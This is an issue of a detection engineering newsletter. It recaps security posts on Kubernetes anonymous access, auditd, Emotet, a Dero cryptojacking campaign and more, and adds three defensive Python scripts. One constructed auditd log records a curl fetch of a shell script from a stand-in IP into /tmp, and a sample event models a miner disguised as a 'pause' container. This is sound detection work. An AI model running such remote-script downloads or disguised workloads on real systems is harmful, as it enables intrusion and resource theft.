Detection Engineering Weekly #16 - Breached is down, everyone get in here!
Last week's news and how-tos in the art and science of Detection Engineering
Welcome to Issue #16 of Detection Engineering Weekly!
This week’s recap:
💎 of a post by Jorge Orchilles at SANS on threat-informed detection engineering
More YouTube content, this time an interesting format on Atomics on a Friday, as well as deep-dive investigations inside O365/Azure
A Naruto-themed Go botnet, Emotet uses OneNote (CALLED IT!), and Breached goes down
Explain Detection Engineering to your CEO: Feature #9 - b4stet4
This reads like an ill omen cast upon weary travelers who dare defy detection engineering only to sow despair and obtain a false sense of security. Alright, sorry, I’m rewatching Lord of the Rings right now, so it is biasing my response. I like how b4stet4 juxtaposed new threats evolving with your business, so you need to stay current and implement the “lifecycle” of detections. Security is a field where a detection can become obsolete in a matter of hours, especially during an emerging event like Log4Shell.
💎 Detection Engineering Gem 💎
Purple Teaming and Threat-Informed Detection Engineering by Jorge Orchilles and Christopher Peacock
Orchilles and Peacock present a threat-informed approach to Detection Engineering through the Purple Team vehicle. By having an intelligence team consume cyber threat intel reports, they can suggest backlog items to the red team to test defenses in a “purple team” scenario. The “Process of Detection Engineering” flywheel looks very similar to the threat intelligence lifecycle (see page 4), but I appreciate the approach nonetheless. I’d love to hear from a company that has an organization big enough to split intel, red team, purple team, detection eng and SOC up and has a process like this implemented. I imagine most readers do this anyway, but with a lot fewer people.
State of the Art
Atomics on a Friday - Purple March Madness Ep 3 by Michael Haag and Paul Michaud
If you haven’t checked out Haag’s & Michaud’s “Atomics on a Friday” live stream, you definitely should! I am starting to see more video content for Detection Engineering, and Haag/Michaud do a great job of bringing on interesting guests that demonstrate concepts in Purple Teaming/Detection Engineering. It’s cool to see guests share their screens and dive deep into a topic like a brown bag lunch!
Diary of a Detection Engineer: Exposing and shutting down an inbox heist in action by Justin Schoenfeld
Great walkthrough of a compromise, from the initial alert through remediation. This post shows the “other side” of Detection Engineering, which is of course response and remediation :). Schoenfeld describes the reasoning behind diving deep on this specific alert, which includes heuristics around the user’s location, the IP address coming from a known VPN endpoint, and browser-based activity.
Threat Detection Bad Trips: Log Everything! by Alex Teixeira
Garbage in, garbage out. An age-old adage for computer scientists, but now applied to the SIEM use-cases of logging everything possible and “figuring it out” later. Not only does it make detections harder, but logging everything can also cost you money and tech debt in other areas of the business.
Let's talk about anonymous access to Kubernetes by Rory McCune
In this post, Rory quickly reviews a cryptojacking campaign in Kubernetes (Dero, to be specific; CrowdStrike’s write-up is linked below in Threat Landscape) and how anonymous access in Kubernetes works. I did not know that anonymous authentication is enabled by default on the kube-apiserver (--anonymous-auth=true): a request with no valid credential runs as system:anonymous, and RBAC is the only thing limiting what it can do. Make sure to review this post and audit your deployment before exposing your clusters to outside network connections (just please, not the internet!)
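One way to do that audit, as an added example that is not from Rory’s post or the Kubernetes project: feed the JSON from `kubectl get clusterrolebindings,rolebindings -A -o json` to the script below and it lists every binding whose subjects include the anonymous user or the unauthenticated group. The `system:public-info-viewer` binding is shipped by default and only exposes the health and version endpoints; everything else is flagged for review. The sample document embedded at the bottom is constructed for the example (the `dev-shortcut` binding is invented), so it runs offline.

```python
"""Flag RBAC bindings that hand rights to callers with no credentials.

Usage: kubectl get clusterrolebindings,rolebindings -A -o json | python3 anon_rbac.py
"""
import json
import sys

# With --anonymous-auth=true (the kube-apiserver default) a request that carries
# no valid credential runs as user "system:anonymous" in group
# "system:unauthenticated"; RBAC is the only thing limiting what it can do.
ANON_SUBJECTS = {
    ("User", "system:anonymous"),
    ("Group", "system:unauthenticated"),
}

# Stock binding shipped with every cluster: it only exposes /healthz, /livez,
# /readyz and /version. Anything else naming these subjects deserves a look.
KNOWN_DEFAULTS = {("ClusterRoleBinding", "system:public-info-viewer")}


def find_anonymous_bindings(doc):
    """Return [(kind, namespace, name, role, is_known_default)] for every
    binding whose subjects include an anonymous/unauthenticated caller."""
    hits = []
    for item in doc.get("items", []):
        kind, meta = item["kind"], item["metadata"]
        subjects = item.get("subjects") or []
        if not any((s.get("kind"), s.get("name")) in ANON_SUBJECTS for s in subjects):
            continue
        role = f'{item["roleRef"]["kind"]}/{item["roleRef"]["name"]}'
        hits.append((kind, meta.get("namespace", ""), meta["name"], role,
                     (kind, meta["name"]) in KNOWN_DEFAULTS))
    return hits


def audit(raw_json):
    """Parse kubectl's JSON list output and return the findings."""
    return find_anonymous_bindings(json.loads(raw_json))


# Constructed sample standing in for kubectl output: the stock default, an
# invented anonymous -> cluster-admin binding, and an ordinary service-account one.
SAMPLE = json.dumps({"kind": "List", "items": [
    {"kind": "ClusterRoleBinding",
     "metadata": {"name": "system:public-info-viewer"},
     "roleRef": {"kind": "ClusterRole", "name": "system:public-info-viewer"},
     "subjects": [{"kind": "Group", "name": "system:authenticated"},
                  {"kind": "Group", "name": "system:unauthenticated"}]},
    {"kind": "ClusterRoleBinding",
     "metadata": {"name": "dev-shortcut"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "User", "name": "system:anonymous"}]},
    {"kind": "RoleBinding",
     "metadata": {"name": "ci-deployer", "namespace": "ci"},
     "roleRef": {"kind": "Role", "name": "deployer"},
     "subjects": [{"kind": "ServiceAccount", "name": "ci", "namespace": "ci"}]},
]})


if __name__ == "__main__":
    raw = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for kind, ns, name, role, known in audit(raw):
        tag = "expected" if known else "REVIEW"
        print(f"{tag:9} {kind:19} {ns or '-':8} {name:28} -> {role}")
```

A quick external sanity check from outside the cluster is `curl -k https://<api-server>:6443/api` with no credentials: an HTTP 403 that mentions system:anonymous means anonymous auth is on and RBAC stopped the request, while a 401 means anonymous auth is off entirely.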
Detect Changes in Defender for Office 365 (MDO) Service Level Settings by Sami Lamppu
Microsoft Defender for Office 365, or MDO, has a number of service-level settings that, if an attacker can change them, offer several interesting ways to masquerade or hide inside an environment. Lamppu discusses three scenarios in detail where an attacker can influence how data is logged or manipulated in an MDO environment so specific attacks aren’t logged correctly. The blog has corresponding KQL queries, audit log configurations and detection opportunities.
Use Searching Engines to Hunt For Threat Actors by Russell Adler
This blog is a unique intersection of red teaming, threat intelligence, and detection engineering. I am a big fan of using detection cycles to find, fingerprint, and create detections for attacker infrastructure. There are so many open-source C2 frameworks out there it becomes relatively easy to downselect those tools with public reports against your environment and detect traffic. In this post, follow Adler as they navigate through different search engine tools to find open directories and C2 servers of real threat actors and then use those for detection opportunities.
Linux auditd for Threat Detection [Final] by IzyKnows
This is the final part of a three-part series by IzyKnows on using Linux’s auditd for threat detection. The author goes into detail on how auditd collects information, what it tends to miss, and the different classes of “record types” that auditd generates for certain events. The gem in this post is the corresponding Google Sheet mapping data sources to auditd record types.
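To make the record-type discussion concrete, here is an added example (mine, not from the IzyKnows series) that groups raw auditd lines into events and rebuilds the command line from the EXECVE record. Two details trip people up in practice: all records of one event share the same `audit(timestamp:serial)` stamp and are closed by a `type=EOE` record, and auditd emits string fields that contain whitespace or control characters as unquoted uppercase hex rather than as a quoted string. The two events at the bottom are constructed for the example; the `find_downloads` rule is a toy illustration, not a production detection.

```python
"""Group raw auditd records into events and rebuild EXECVE command lines."""
import re
from collections import defaultdict

# type=SYSCALL msg=audit(1679000000.123:4242): arch=... -> (type, timestamp, serial, rest)
_HEADER = re.compile(r'^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\):\s*(.*)$')
# key="quoted value" or key=bare_value
_FIELD = re.compile(r'(\S+?)=(?:"([^"]*)"|(\S*))')
# EXECVE argument keys: a0, a1, ... and aN[0], aN[1], ... for long arguments
_ARG = re.compile(r'^a(\d+)(?:\[(\d+)\])?$')
# String fields auditd emits as unquoted uppercase hex when they contain
# whitespace or control characters (e.g. a2=6563686F2068656C6C6F).
_HEX_FIELDS = {"comm", "exe", "cwd", "name", "proctitle"}


def _decode(rtype, key, quoted, bare):
    if quoted is not None:
        return quoted
    hex_field = key in _HEX_FIELDS or (rtype == "EXECVE" and _ARG.match(key))
    if hex_field and bare and len(bare) % 2 == 0 and re.fullmatch(r'[0-9A-F]+', bare):
        return bytes.fromhex(bare).decode("utf-8", "replace")
    return bare


def parse_record(line):
    """One log line -> (type, timestamp, serial, {field: value}) or None."""
    m = _HEADER.match(line.strip())
    if not m:
        return None
    rtype, ts, serial, rest = m.groups()
    fields = {f.group(1): _decode(rtype, f.group(1), f.group(2), f.group(3))
              for f in _FIELD.finditer(rest)}
    return rtype, float(ts), int(serial), fields


def group_events(lines):
    """All records sharing one audit(ts:serial) stamp form one event; auditd
    marks the end of a multi-record event with type=EOE."""
    events = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        rtype, ts, serial, fields = rec
        ev = events.setdefault(serial, {"serial": serial, "time": ts, "records": defaultdict(list)})
        ev["records"][rtype].append(fields)
    return [events[s] for s in sorted(events)]


def execve_argv(event):
    """Rebuild argv from the EXECVE record, joining split long arguments."""
    recs = event["records"].get("EXECVE")
    if not recs:
        return None
    parts = defaultdict(dict)
    for key, value in recs[0].items():
        m = _ARG.match(key)
        if m:
            parts[int(m.group(1))][int(m.group(2) or 0)] = value
    return ["".join(parts[i][c] for c in sorted(parts[i])) for i in sorted(parts)]


def find_downloads(events):
    """Toy rule: curl/wget fetching a URL. Returns (serial, argv, cwd, auid)."""
    hits = []
    for ev in events:
        argv = execve_argv(ev)
        if not argv or argv[0].rsplit("/", 1)[-1] not in ("curl", "wget"):
            continue
        if any(a.startswith(("http://", "https://")) for a in argv[1:]):
            cwd = ev["records"].get("CWD", [{}])[0].get("cwd")
            auid = ev["records"].get("SYSCALL", [{}])[0].get("auid")
            hits.append((ev["serial"], argv, cwd, auid))
    return hits


# Constructed sample of two execve events as a rule like
# `auditctl -a always,exit -F arch=b64 -S execve -k exec` would record them;
# the second event's a2 is hex-encoded because "echo hello" contains a space.
SAMPLE = """\
type=SYSCALL msg=audit(1679000000.123:4242): arch=c000003e syscall=59 success=yes exit=0 a0=55d0c8a6f2a0 a1=55d0c8a6f3c0 a2=55d0c8a70a40 a3=8 items=2 ppid=1337 pid=1338 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="curl" exe="/usr/bin/curl" key="exec"
type=EXECVE msg=audit(1679000000.123:4242): argc=3 a0="curl" a1="-s" a2="http://203.0.113.5/x.sh"
type=CWD msg=audit(1679000000.123:4242): cwd="/tmp"
type=PATH msg=audit(1679000000.123:4242): item=0 name="/usr/bin/curl" inode=1234 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=EOE msg=audit(1679000000.123:4242):
type=SYSCALL msg=audit(1679000001.500:4243): arch=c000003e syscall=59 success=yes exit=0 a0=1 a1=2 a2=3 a3=0 items=2 ppid=1338 pid=1340 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1679000001.500:4243): argc=3 a0="bash" a1="-c" a2=6563686F2068656C6C6F
type=CWD msg=audit(1679000001.500:4243): cwd="/home/alice"
type=EOE msg=audit(1679000001.500:4243):
"""

if __name__ == "__main__":
    evs = group_events(SAMPLE.splitlines())
    for ev in evs:
        print(ev["serial"], execve_argv(ev))
    print("downloads:", find_downloads(evs))
```

Grouping on the serial rather than on the timestamp matters: two events can share a timestamp, but the serial is unique per event, and a detection that only looks at the SYSCALL record never sees the arguments, which live in EXECVE.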
Detection Engineering on Social Media
Threat Landscape
Uncovering HinataBot: A Deep Dive into a Go-Based Threat by Chad Seaman, Larry Cashdollar & Allen West
The Akamai team uncovered a Go-based malware that is attributed to the “HinataBot” botnet. Named after an anime character, the malware exploits some older CVEs to access routers, webservers, and poorly configured SSH servers to perform HTTP and UDP-based DDoS attacks. For the anime fans in the crowd, yeah, that Hinata :).
Feds Charge NY Man as BreachForums Boss “Pompompurin” by Brian Krebs
Pompompurin gets arrested, and as of Mar 21, Breached is down
I’m sure another Raidforums/Breached will rise from the ashes, but there’s some schadenfreude on my end as we see some criminals scramble after a significant arrest like this.
CrowdStrike Discovers First-Ever Dero Cryptojacking Campaign Targeting Kubernetes by Benjamin Grap & Manoj Ahuje
If you read Rory’s piece above, read this next. Or if you read this first, go read Rory’s article next! Besides the “we were FIRST to discover this malware..” marketing-speak, this blog focuses on malware that explicitly targets Kubernetes infrastructure. It is deployed as a DaemonSet, which schedules a pod on every node in the cluster so the miner can use all the available resources. Here is the most interesting masquerading done by the attackers, from the blog:
Furthermore, attackers made no attempts to delete or disrupt cluster operation. Instead, they deployed a DaemonSet to mine Dero by masquerading the DaemonSet name to “proxy-api” and miner’s name to “pause”, which are common terms in Kubernetes logs.
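That masquerade suggests a detection. Below is an added example (mine, not CrowdStrike’s) that reviews Kubernetes API audit events for DaemonSet writes and flags the three tells visible in the quote above: the caller is unauthenticated, the DaemonSet carries a system-sounding name outside kube-system, or a container named like an infrastructure component (such as “pause”) is pulled from somewhere other than a trusted registry. The trusted-registry list, the system-namespace list and the look-alike names beyond “proxy-api” and “pause” are assumptions to tune for your estate; the audit events are constructed, and the rule needs the audit policy to log DaemonSet writes at level Request or RequestResponse so the submitted manifest is present.

```python
"""Review Kubernetes API audit events for DaemonSets that borrow system-looking names."""

# Assumptions for this example: infrastructure images come only from these
# registries, and real system DaemonSets live only in kube-system. Tune both.
TRUSTED_REGISTRIES = ("registry.k8s.io/", "k8s.gcr.io/")
SYSTEM_NAMESPACES = {"kube-system"}
# Names that blend into routine cluster logs; "proxy-api" and "pause" are the
# two reported for the Dero campaign, the rest are added here as plausible cover.
LOOKALIKE_NAMES = {"proxy-api", "pause", "kube-proxy", "coredns", "metrics-server"}


def review_daemonset_event(event):
    """Return the reasons an audit event looks like a masquerading DaemonSet ([] if clean).
    Expects an audit.k8s.io/v1 Event logged at level Request or RequestResponse,
    so that requestObject (the submitted manifest) is present."""
    ref = event.get("objectRef", {})
    if ref.get("resource") != "daemonsets" or event.get("verb") not in ("create", "update", "patch"):
        return []
    reasons = []
    user = event.get("user", {})
    name, ns = ref.get("name", ""), ref.get("namespace", "")

    # 1. Who did it: an unauthenticated caller should never be creating workloads.
    if user.get("username") == "system:anonymous" or "system:unauthenticated" in user.get("groups", []):
        reasons.append(f"submitted by unauthenticated caller {user.get('username')!r}")

    # 2. Where it lives: a system-sounding DaemonSet outside kube-system.
    if name in LOOKALIKE_NAMES and ns not in SYSTEM_NAMESPACES:
        reasons.append(f"system-looking name {name!r} in namespace {ns!r}")

    # 3. What it runs: a container called "pause" (or similar) pulled from an untrusted registry.
    pod_spec = event.get("requestObject", {}).get("spec", {}).get("template", {}).get("spec", {})
    for c in pod_spec.get("containers", []) + pod_spec.get("initContainers", []):
        image = c.get("image", "")
        if c.get("name") in LOOKALIKE_NAMES and not image.startswith(TRUSTED_REGISTRIES):
            reasons.append(f"container {c.get('name')!r} runs untrusted image {image!r}")
    return reasons


def scan(events):
    """Return [(namespace, name, username, reasons)] for every flagged event."""
    out = []
    for ev in events:
        reasons = review_daemonset_event(ev)
        if reasons:
            ref = ev["objectRef"]
            out.append((ref.get("namespace", ""), ref.get("name", ""),
                        ev.get("user", {}).get("username", ""), reasons))
    return out


# Constructed audit events: one modelled on the reported campaign, one legitimate
# kube-proxy rollout, and one unrelated read that the rule must ignore.
SAMPLE_EVENTS = [
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "RequestResponse", "verb": "create",
     "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "objectRef": {"apiGroup": "apps", "resource": "daemonsets", "namespace": "default", "name": "proxy-api"},
     "requestObject": {"spec": {"template": {"spec": {"containers": [
         {"name": "pause", "image": "docker.io/example/miner:latest"}]}}}}},
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "RequestResponse", "verb": "create",
     "user": {"username": "kubernetes-admin", "groups": ["system:masters", "system:authenticated"]},
     "objectRef": {"apiGroup": "apps", "resource": "daemonsets", "namespace": "kube-system", "name": "kube-proxy"},
     "requestObject": {"spec": {"template": {"spec": {"containers": [
         {"name": "kube-proxy", "image": "registry.k8s.io/kube-proxy:v1.26.3"}]}}}}},
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "Metadata", "verb": "get",
     "user": {"username": "alice", "groups": ["system:authenticated"]},
     "objectRef": {"resource": "pods", "namespace": "default", "name": "web-0"}},
]

if __name__ == "__main__":
    for ns, name, who, reasons in scan(SAMPLE_EVENTS):
        print(f"{ns}/{name} by {who}:")
        for r in reasons:
            print("  -", r)
```

The image check is the one that survives a rename: an attacker can call the DaemonSet anything, but a real “pause” container comes from the platform’s registry, so a “pause” pulled from elsewhere is worth a look regardless of what the workload is named.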
Emotet adopts Microsoft OneNote attachments by Malwarebytes Threat Intelligence Team
Remember how I said last week that Emotet is back, but Ivan the operator hasn’t updated the delivery payload to use OneNote attachments? Well, it only took a week, but Malwarebytes found an Emotet campaign that uses OneNote attachments as a delivery mechanism. I’m not saying the Emotet operators got this idea from me or that they are subscribers to my newsletter, but I do feel like a threat landscape Oracle connecting the dots here.
Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation by Alexander Marvi, Brad Slaybaugh, Dan Ebreo, Tufail Ahmed, Muhammad Umair and Tina Johnson
Fortinet, whose advisories land dozens of vulnerabilities at a time (many of them ending up in CISA’s Known Exploited Vulnerabilities catalog), has its devices exploited here by suspected Chinese cyber-espionage actors to carry out their operations. The specific vulnerability, CVE-2022-41328, was added to CISA’s catalog on March 14 this month! I particularly enjoyed reading Mandiant’s analysis, and how they hammer home the importance of monitoring devices that EDRs cannot protect, such as the networking appliances Fortinet sells.
Bee-Ware of Trigona, An Emerging Ransomware Strain by Frank Lee and Scott Roland
Trigona is a unique ransomware variant that drops its ransom note as an HTML page with embedded JavaScript. In this post, Unit 42 combines intelligence gleaned from VTI with their own incident response practice and finds some similarities between the strain and CryLock. Some victim overlap also existed with BlackCat/ALPHV. Lots of detection opportunities at the bottom of the post!
Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace by James Sadowski and Casey Charrier
Alright, besides the easter eggs of early oughts classics from Ludacris and Britney Spears, this blog post links zero days and incidents that Mandiant has observed through their own telemetry and open-source reporting. I am unsure if some of this open-source reporting is linked to CISA’s KEV, but it shows that threat actors are capitalizing on “edge infrastructure” products. This is a similar finding from another Mandiant report linked earlier with cyber-espionage actors targeting Fortinet devices.
Open Source
Red Team Toolkit by infosecn1nja
Excellent “awesome-like” list of red team tools to test your detections on.
Fluentd-MySQ by qjlawls2003
Interesting fluentd config to send syslog logs to a remote MySQL server. Definitely ripe for SQL injection, but thought it might be fun to play around with.
Awesome Kubernetes (K8s) Threat Detection Awesome by jatrost
Another “awesome” list, this time dedicated to Kubernetes threat detection. jatrost has been killing it with these lists!
Regarding the Gem - we split every team (detection engineering, hunt, intel, red team, etc.). Some are even in entirely different directorates. What questions did you have? I can share that one challenge we have as a detection engineering team is that consuming reporting from so many sources to add to our backlog is arduous and time consuming. This takes a lot of time from detection engineering development. We’re working on developing a method to automate it, but right now it’s duct tape and glue. Have you seen any approaches that work well?